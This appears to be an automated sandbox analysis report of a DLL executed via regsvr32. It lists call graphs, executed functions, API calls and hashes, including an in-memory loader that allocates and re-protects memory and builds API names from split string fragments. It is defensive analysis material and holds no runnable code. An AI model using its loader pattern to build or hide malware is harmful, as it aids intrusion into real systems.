18001b337 20802->20805 20806 18001b377 GlobalLock 20803->20806 20808 18001b358 GlobalHandle GlobalLock 20803->20808 20809 18001b367 LeaveCriticalSection 20803->20809 20805->20799 20806->20795 20808->20809 20810 18000bc90 Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 20809->20810 20811 18001b376 20810->20811 20811->20806 20813 18001b241 20812->20813 20814 18001b247 InitializeCriticalSection 20812->20814 20815 18000bc90 Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 20813->20815 20814->20746 20816 18001b246 20815->20816 20816->20814 20818 18001b115 LeaveCriticalSection 20817->20818 20819 18001b0e7 20817->20819 20821 18001b121 20818->20821 20819->20818 20820 18001b0ec TlsGetValue 20819->20820 20820->20818 20822 18001b0f9 20820->20822 20821->20744 20821->20745 20822->20818 20823 18001b0fe LeaveCriticalSection 20822->20823 20823->20821 20825 18001b4c8 20824->20825 20826 18001b5f7 LeaveCriticalSection 20824->20826 20825->20826 20828 18001b4d1 TlsGetValue 20825->20828 20827 18001b601 20826->20827 20827->20744 20829 18001b4f5 20828->20829 20832 18001b4e1 20828->20832 20830 18001b08c Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20829->20830 20830->20832 20833 18001b5d9 LeaveCriticalSection 20832->20833 20834 18001b535 20832->20834 20835 18001b560 20832->20835 20833->20827 20837 18001b551 LocalAlloc 20834->20837 20840 18000101c Concurrency::details::ExternalContextBase::~ExternalContextBase 49 API calls 20834->20840 20836 18001b57c LocalReAlloc 20835->20836 20838 18000101c Concurrency::details::ExternalContextBase::~ExternalContextBase 49 API calls 20835->20838 20839 18001b591 20836->20839 20837->20839 20841 18001b57b 20838->20841 20842 18001b5a5 shared_ptr 20839->20842 20843 18001b596 LeaveCriticalSection 20839->20843 20844 18001b550 20840->20844 20841->20836 20846 18001b5c6 TlsSetValue 20842->20846 20845 18000bc90 Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 20843->20845 20844->20837 20845->20842 20846->20833 20848 180001028 20847->20848 20849 18000102d 20847->20849 20850 18000bc90 Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 20848->20850 20853 18000b9dc 20849->20853 20850->20849 20870 18000b754 20853->20870 20855 18000b9fc Concurrency::details::ExternalContextBase::~ExternalContextBase 20856 180020530 __SehTransFilter RaiseException 20855->20856 20857 18000ba3c FormatMessageA 20856->20857 20859 180001033 20857->20859 20860 18000ba8d 20857->20860 20874 180020500 20860->20874 20862 18000bacb LocalFree 20862->20859 20863 18000bac4 20864 18000bc90 Concurrency::details::ExternalContextBase::~ExternalContextBase RaiseException 20863->20864 20868 18000baca 20864->20868 20865 18000babe 20867 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20865->20867 20867->20863 20868->20862 20869 18000bcd8 Concurrency::details::ExternalContextBase::~ExternalContextBase 2 API calls 20869->20865 20873 18000b763 20870->20873 20871 180020248 malloc 45 API calls 20871->20873 20872 18000b788 20872->20855 20873->20871 20873->20872 20875 180025e14 Concurrency::details::ExternalContextBase::~ExternalContextBase 45 API calls 20874->20875 20876 18000baa1 20875->20876 20876->20862 20876->20863 20876->20865 20876->20869 20878 1800283d3 malloc 20877->20878 20879 1800283a1 20877->20879 20882 1800283eb RtlAllocateHeap 20878->20882 20885 1800283cf 20878->20885 20879->20878 20880 1800283af 20879->20880 20881 180020618 _errno 44 API calls 20880->20881 20883 1800283b4 20881->20883 20882->20878 20882->20885 20884 180021830 _FF_MSGBANNER 7 API calls 20883->20884 20884->20885 20885->20051 20888 180023429 20887->20888 20916 18002354a 20887->20916 20889 180023444 20888->20889 20890 180020300 free 45 API calls 20888->20890 20891 180023452 20889->20891 20892 180020300 free 45 API calls 20889->20892 20890->20889 20893 180023460 20891->20893 20894 180020300 free 45 API calls 20891->20894 20892->20891 20895 18002346e 20893->20895 20897 180020300 free 45 API calls 20893->20897 20894->20893 20896 18002347c 20895->20896 20898 180020300 free 45 API calls 20895->20898 20899 18002348a 20896->20899 20900 180020300 free 45 API calls 20896->20900 20897->20895 20898->20896 20901 18002349b 20899->20901 20902 180020300 free 45 API calls 20899->20902 20900->20899 20903 1800234b3 20901->20903 20904 180020300 free 45 API calls 20901->20904 20902->20901 20905 180026f7c _lock 45 API calls 20903->20905 20904->20903 20908 1800234bd 20905->20908 20906 1800234eb 20919 180026e7c LeaveCriticalSection 20906->20919 20908->20906 20910 180020300 free 45 API calls 20908->20910 20910->20906 20916->20079 20921 180004bc4 20920->20921 20922 180004bc8 RtlDeleteBoundaryDescriptor 20920->20922 20921->19941 20921->19946 20922->20921 20925 180004a3a 20924->20925 20925->19941 20926 11f0000 20927 11f0185 20926->20927 20928 11f03f2 VirtualAlloc 20927->20928 20931 11f0418 20928->20931 20929 11f04dc GetNativeSystemInfo 20930 11f0518 VirtualAlloc 20929->20930 20933 11f0a09 20929->20933 20932 11f0536 VirtualAlloc 20930->20932 20936 11f054b 20930->20936 20931->20929 20931->20933 20932->20936 20934 11f0998 20934->20933 20935 11f09e4 RtlAvlRemoveNode 20934->20935 20935->20933 20936->20934 20937 11f0971 VirtualProtect 20936->20937 20937->20936 20938 18000a5b0 20941 180004648 20938->20941 20940 18000a5c7 ExitProcess 20942 180004892 __SehTransFilter 20941->20942 20942->20940

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 011F0000 Relevance: 74.6, APIs: 6, Strings: 36, Instructions: 1066memoryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 13 11f0000-11f0416 call 11f0a40 * 2 VirtualAlloc 34 11f043a-11f0441 13->34 35 11f0418-11f041c 13->35 37 11f0447-11f044b 34->37 38 11f0a23 34->38 36 11f041e-11f0438 35->36 36->34 36->36 37->38 40 11f0451-11f0455 37->40 39 11f0a25-11f0a3f 38->39 40->38 41 11f045b-11f045f 40->41 41->38 42 11f0465-11f046c 41->42 42->38 43 11f0472-11f047f 42->43 43->38 44 11f0485-11f048e 43->44 44->38 45 11f0494-11f049f 44->45 45->38 46 11f04a5-11f04b2 45->46 47 11f04dc-11f0512 GetNativeSystemInfo 46->47 48 11f04b4-11f04bc 46->48 47->38 50 11f0518-11f0534 VirtualAlloc 47->50 49 11f04be-11f04c3 48->49 51 11f04cc 49->51 52 11f04c5-11f04ca 49->52 53 11f054b-11f0554 50->53 54 11f0536-11f0549 VirtualAlloc 50->54 55 11f04ce-11f04da 51->55 52->55 56 11f0561-11f0564 53->56 54->53 55->47 55->49 57 11f0556-11f055e 56->57 58 11f0566-11f0580 56->58 57->56 59 11f0582-11f0587 58->59 60 11f05c0-11f05cd 58->60 61 11f0589-11f058f 59->61 62 11f05d3-11f05da 60->62 63 11f0690-11f0697 60->63 64 11f0591-11f05ae 61->64 65 11f05b0-11f05be 61->65 62->63 66 11f05e0-11f05ed 62->66 67 11f069d-11f06ae 63->67 68 11f0809-11f0810 63->68 64->64 64->65 65->60 65->61 66->63 71 11f05f3-11f05f4 66->71 72 11f06b7-11f06ba 67->72 69 11f0816-11f0824 68->69 70 11f08b3-11f08c5 68->70 75 11f08aa-11f08ad 69->75 73 11f08cb-11f08d3 70->73 74 11f0998-11f09ab 70->74 76 11f05f9-11f0607 71->76 77 11f06bc-11f06bf 72->77 78 11f06b0-11f06b4 72->78 80 11f08d6-11f08da 73->80 96 11f09ad-11f09b8 74->96 97 11f09d1-11f09d8 74->97 75->70 79 11f0829-11f084b 75->79 81 11f0609 76->81 82 11f0684-11f068a 76->82 83 11f073a-11f0740 77->83 84 11f06c1-11f06cf 77->84 78->72 104 11f084d-11f0853 79->104 105 11f08a6-11f08a7 79->105 85 11f0984-11f0992 80->85 86 11f08e0-11f08f5 80->86 87 11f060e-11f061c 81->87 82->63 82->76 89 11f0743-11f0751 83->89 84->89 90 11f06d1-11f06d2 84->90 85->74 85->80 92 11f0918-11f091a 86->92 93 11f08f7-11f08f9 86->93 94 11f061e-11f062b 87->94 95 11f062d-11f0631 87->95 99 11f0757 89->99 100 11f0806-11f0807 89->100 98 11f06d4-11f0736 90->98 108 11f093f-11f0941 92->108 109 11f091c-11f091e 92->109 106 11f08fb-11f0907 93->106 107 11f0909-11f0916 93->107 110 11f0675-11f0682 94->110 111 11f063f-11f0643 95->111 112 11f0633-11f063d 95->112 113 11f09c9-11f09cf 96->113 102 11f09da-11f09e2 97->102 103 11f0a09-11f0a21 97->103 98->98 114 11f0738 98->114 101 11f075a-11f0780 99->101 100->68 135 11f0782-11f0785 101->135 136 11f07e1-11f07e5 101->136 102->103 116 11f09e4-11f0a07 RtlAvlRemoveNode 102->116 103->39 125 11f085d-11f086a 104->125 126 11f0855-11f085b 104->126 105->75 117 11f0956-11f0957 106->117 107->117 123 11f0949-11f0953 108->123 124 11f0943-11f0947 108->124 118 11f0926-11f0928 109->118 119 11f0920-11f0924 109->119 110->82 110->87 121 11f0658-11f065c 111->121 122 11f0645-11f0656 111->122 120 11f0669-11f0670 112->120 113->97 115 11f09ba-11f09c6 113->115 114->89 115->113 116->103 131 11f095d-11f0963 117->131 118->108 129 11f092a-11f092c 118->129 119->117 120->110 121->110 130 11f065e-11f0666 121->130 122->120 123->117 124->117 133 11f086c-11f0873 125->133 134 11f0875-11f0887 125->134 132 11f088c-11f089d 126->132 137 11f092e-11f0934 129->137 138 11f0936-11f093d 129->138 130->120 139 11f0965-11f096b 131->139 140 11f0971-11f0981 VirtualProtect 131->140 132->105 151 11f089f-11f08a4 132->151 133->133 133->134 134->132 142 11f078f-11f079c 135->142 143 11f0787-11f078d 135->143 144 11f07e7 136->144 145 11f07f0-11f07f9 136->145 137->117 138->131 139->140 140->85 148 11f079e-11f07a5 142->148 149 11f07a7-11f07b9 142->149 147 11f07be-11f07d8 143->147 144->145 145->101 150 11f07ff-11f0800 145->150 147->136 153 11f07da-11f07df 147->153 148->148 148->149 149->147 150->100 151->104 153->135
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296532315.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 011F0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_11f0000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Virtual$Alloc$InfoNativeNodeProtectRemoveSystem
                                                                                                                                                                                    • String ID: Cach$Find$Flus$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$p$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce
                                                                                                                                                                                    • API String ID: 808794760-1106743406
                                                                                                                                                                                    • Opcode ID: 96fce6a7bff5e5b76bf571e1cae8f3a184cbff359d7bfa11d59d9d5912008097
                                                                                                                                                                                    • Instruction ID: ade39874ce14386b62acb899197e17212ee324b709511047f1c5569f0c253fe1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 96fce6a7bff5e5b76bf571e1cae8f3a184cbff359d7bfa11d59d9d5912008097
                                                                                                                                                                                    • Instruction Fuzzy Hash: ED72E431618B488FDB1DDF18C8856BAB7E2FB98305F14462DE98BC7212EB34D546CB85
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180004C00 Relevance: 2059.4, APIs: 1, Strings: 1370, Instructions: 2924memoryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocAllocateHeapVirtual
                                                                                                                                                                                    • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$-$-$-$-$-$-$-$-$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5@bYp^kS3Cz_UL#l0$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$7$7$7$7$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$=$=$=$=$>$>$>$>$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@Wx$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$B$B$B$B$B$B$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$D$D$E$E$E$E$E$E$E$E$E$E$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$H$I$I$I$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$M$M$M$M$M$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${${${${${$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~
                                                                                                                                                                                    • API String ID: 1838633152-1724951201
                                                                                                                                                                                    • Opcode ID: 2d7d73c37fecae8605df5aa6a796909f0842c0b95b3783c56ecd4b003069eb60
                                                                                                                                                                                    • Instruction ID: 37dd4164aa71e93fa7bce9b21c04c5e49dc1137560822f9b367f2b228996c10d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d7d73c37fecae8605df5aa6a796909f0842c0b95b3783c56ecd4b003069eb60
                                                                                                                                                                                    • Instruction Fuzzy Hash: 68B3605250DBC5C8E332C23C64587CFAE8193A3319F484299D3E41AADBC7AE8159DF67
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001B25C Relevance: 15.1, APIs: 10, Instructions: 112memoryCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2667261700-0
                                                                                                                                                                                    • Opcode ID: f0cd0788f1e665375fbd08d2c573a301f397109be629cd258b98b8b36acae790
                                                                                                                                                                                    • Instruction ID: 11f99c641814f6a2120a34323663aa093d5fcbf9f1caf6e7f45f7da9de1e93a0
                                                                                                                                                                                    • Opcode Fuzzy Hash: f0cd0788f1e665375fbd08d2c573a301f397109be629cd258b98b8b36acae790
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3441B171601A4897EB5ACB25D5543EC7361FB4CBC2F01C425EB6A87B91DF38D669C300
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001FFB4 Relevance: 10.6, APIs: 7, Instructions: 87threadCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0000000180025710: HeapCreate.KERNELBASE(?,?,?,?,000000018001FFC9), ref: 0000000180025722
                                                                                                                                                                                      • Part of subcall function 0000000180025710: HeapSetInformation.KERNEL32 ref: 000000018002574C
                                                                                                                                                                                    • _RTC_Initialize.LIBCMT ref: 000000018001FFE4
                                                                                                                                                                                    • GetCommandLineA.KERNEL32 ref: 000000018001FFE9
                                                                                                                                                                                      • Part of subcall function 00000001800254EC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018001FFFB), ref: 000000018002551B
                                                                                                                                                                                      • Part of subcall function 00000001800254EC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,000000018001FFFB), ref: 000000018002555B
                                                                                                                                                                                      • Part of subcall function 0000000180024D98: GetStartupInfoA.KERNEL32 ref: 0000000180024DBD
                                                                                                                                                                                    • __setargv.LIBCMT ref: 0000000180020012
                                                                                                                                                                                    • _cinit.LIBCMT ref: 0000000180020026
                                                                                                                                                                                      • Part of subcall function 000000018002329C: FlsFree.KERNEL32(?,?,?,?,0000000180020077), ref: 00000001800232AB
                                                                                                                                                                                      • Part of subcall function 000000018002329C: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180020077), ref: 0000000180026E2E
                                                                                                                                                                                      • Part of subcall function 000000018002329C: free.LIBCMT ref: 0000000180026E37
                                                                                                                                                                                      • Part of subcall function 000000018002329C: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000180020077), ref: 0000000180026E57
                                                                                                                                                                                      • Part of subcall function 0000000180024C8C: Sleep.KERNEL32(?,?,?,00000001800233AB,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180024CD1
                                                                                                                                                                                    • FlsSetValue.KERNEL32 ref: 00000001800200AC
                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00000001800200C0
                                                                                                                                                                                    • free.LIBCMT ref: 00000001800200CF
                                                                                                                                                                                      • Part of subcall function 0000000180020300: HeapFree.KERNEL32(?,?,00000000,00000001800233E4,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180020316
                                                                                                                                                                                      • Part of subcall function 0000000180020300: _errno.LIBCMT ref: 0000000180020320
                                                                                                                                                                                      • Part of subcall function 0000000180020300: GetLastError.KERNEL32(?,?,00000000,00000001800233E4,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180020328
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Heapfree$CriticalDeleteEnvironmentFreeSectionStrings$CommandCreateCurrentErrorInfoInformationInitializeLastLineSleepStartupThreadValue__setargv_cinit_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1549890855-0
                                                                                                                                                                                    • Opcode ID: 9530ca360e5a6c91f0025d551154d36cc27b1b30c2770dcf46c3c1223d65c3dd
                                                                                                                                                                                    • Instruction ID: d01bf37bb7470735549378ab2ef13b898c9f3bb6232b5f66a1b71ec66589f0ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9530ca360e5a6c91f0025d551154d36cc27b1b30c2770dcf46c3c1223d65c3dd
                                                                                                                                                                                    • Instruction Fuzzy Hash: E1313830601B0D85FBE777B194863ED23955F5D3D6F20C929B855892C3EF68874D4325
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800267C0 Relevance: 9.1, APIs: 6, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _getptd.LIBCMT ref: 00000001800267DF
                                                                                                                                                                                      • Part of subcall function 00000001800264B8: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,00000001800267FA,?,?,?,?,?,00000001800269CF), ref: 00000001800264E2
                                                                                                                                                                                      • Part of subcall function 0000000180024C20: malloc.LIBCMT ref: 0000000180024C3F
                                                                                                                                                                                      • Part of subcall function 0000000180024C20: Sleep.KERNEL32(?,?,00000000,0000000180026EF5,?,?,00000000,0000000180026F9F,?,?,?,?,?,?,00000000,00000001800233D0), ref: 0000000180024C56
                                                                                                                                                                                    • free.LIBCMT ref: 000000018002686B
                                                                                                                                                                                      • Part of subcall function 0000000180020300: HeapFree.KERNEL32(?,?,00000000,00000001800233E4,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180020316
                                                                                                                                                                                      • Part of subcall function 0000000180020300: _errno.LIBCMT ref: 0000000180020320
                                                                                                                                                                                      • Part of subcall function 0000000180020300: GetLastError.KERNEL32(?,?,00000000,00000001800233E4,?,?,00000018,0000000180020621,?,?,?,?,00000001800202E6,?,?,00000018), ref: 0000000180020328
                                                                                                                                                                                    • _lock.LIBCMT ref: 00000001800268A3
                                                                                                                                                                                    • free.LIBCMT ref: 0000000180026953
                                                                                                                                                                                    • free.LIBCMT ref: 0000000180026983
                                                                                                                                                                                    • _errno.LIBCMT ref: 0000000180026988
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2878544890-0
                                                                                                                                                                                    • Opcode ID: 89782bc3b0f656579708733da8eca1d2f93d827173c25c5431bf9a1dce3e192a
                                                                                                                                                                                    • Instruction ID: af0133700c0d7037df043fa7cabb32f1a7adc2f9dfda83af6934f9dbd9c693e3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89782bc3b0f656579708733da8eca1d2f93d827173c25c5431bf9a1dce3e192a
                                                                                                                                                                                    • Instruction Fuzzy Hash: A051C431A01A4886E7D39B2594403E9B7A5F78CBD9F64C216FA9E473A6CF38C649C710
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180023598 Relevance: 4.5, APIs: 3, Instructions: 35memorythreadCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0000000180021220: _initp_misc_winsig.LIBCMT ref: 0000000180021259
